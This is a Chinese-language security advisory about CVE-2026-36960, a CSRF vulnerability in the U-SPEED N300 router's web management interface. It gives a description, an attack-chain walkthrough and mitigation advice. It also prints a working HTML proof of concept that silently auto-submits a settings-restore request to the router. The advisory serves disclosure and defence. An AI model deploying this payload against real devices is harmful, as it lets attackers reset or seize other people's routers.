IPBUF安全漏洞报告
English
CVE-2026-36960 CVSS 8.8 高危

CVE-2026-36960 U-SPEED N300路由器CSRF漏洞

披露日期: 2026-04-30

漏洞信息

漏洞编号
CVE-2026-36960
漏洞类型
跨站请求伪造 (CSRF)
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
U-SPEED N300 Rounter

相关标签

CSRFU-SPEED路由器高危漏洞Web安全

漏洞概述

U-SPEED N300路由器V1.0.0版本的Web管理接口存在跨站请求伪造(CSRF)漏洞。由于设备未实施防CSRF令牌及严格的Origin/Referer头校验,攻击者可构造恶意网页。一旦认证管理员访问该页面,其浏览器将自动附带有效会话Cookie向配置端点发送伪造HTTP请求,导致路由器误将其视为合法操作,进而执行系统配置修改等高危指令。

技术细节

该漏洞的核心在于U-SPEED N300路由器Web管理界面对有状态改变请求的防御机制缺失。具体而言,设备在处理如修改网络配置、管理员密码等敏感API请求时,仅依赖客户端Cookie中的会话ID进行身份认证,未实施二次验证机制。攻击者利用CSRF特性,构造包含恶意HTML表单或JavaScript代码的攻击页面,将请求的目标URL设为路由器内部管理接口。当已登录的管理员用户受到社会工程学诱导访问该恶意页面时,浏览器会根据同源策略自动附带当前域名的有效Cookie向路由器发起请求。由于路由器未校验HTTP Referer头或Origin头,也未比对抗CSRF令牌,导致服务器无法区分请求是由用户主动发起还是由恶意页面伪造,从而直接执行请求内容,造成系统完整性、机密性及可用性全面受损。

攻击链分析

STEP 1
侦察与准备
攻击者确认目标使用U-SPEED N300路由器,并分析其管理接口的请求结构。
STEP 2
构造攻击页面
攻击者编写包含恶意表单的HTML页面,该表单指向路由器的敏感配置接口(如修改管理员密码或DNS设置)。
STEP 3
社会工程学诱导
攻击者将恶意页面部署在互联网上,并通过钓鱼邮件或即时通讯工具诱导已登录路由器管理界面的管理员点击链接。
STEP 4
发送伪造请求
管理员访问页面时,浏览器在后台自动附带管理员的有效Session Cookie,向路由器发送伪造的HTTP POST请求。
STEP 5
执行恶意操作
路由器接收到请求后,因缺乏CSRF防护机制,验证Cookie有效后执行配置更改,攻击者成功控制设备。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC for CSRF vulnerability in U-SPEED N300 Rounter V1.0.0 --> <!-- This HTML page simulates a request to change router settings --> <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://<ROUTER_IP>/goform/SysToolRestore" method="POST"> <input type="hidden" name="SETTINGS" value="RESTORE" /> <input type="hidden" name="CURRENT_PAGE" value="index" /> <input type="submit" value="Submit request" /> </form> <script> // Automatically submit the form when the victim loads the page document.forms[0].submit(); </script> </body> </html>

影响范围

U-SPEED N300 Rounter V1.0.0

防御指南

临时缓解措施
在厂商发布安全更新之前,建议用户在不使用管理界面时及时退出登录。同时,应避免点击来源不明的链接,并配置路由器的访问控制列表(ACL),仅允许受信任的内网IP地址访问Web管理后台,以降低被CSRF攻击的风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表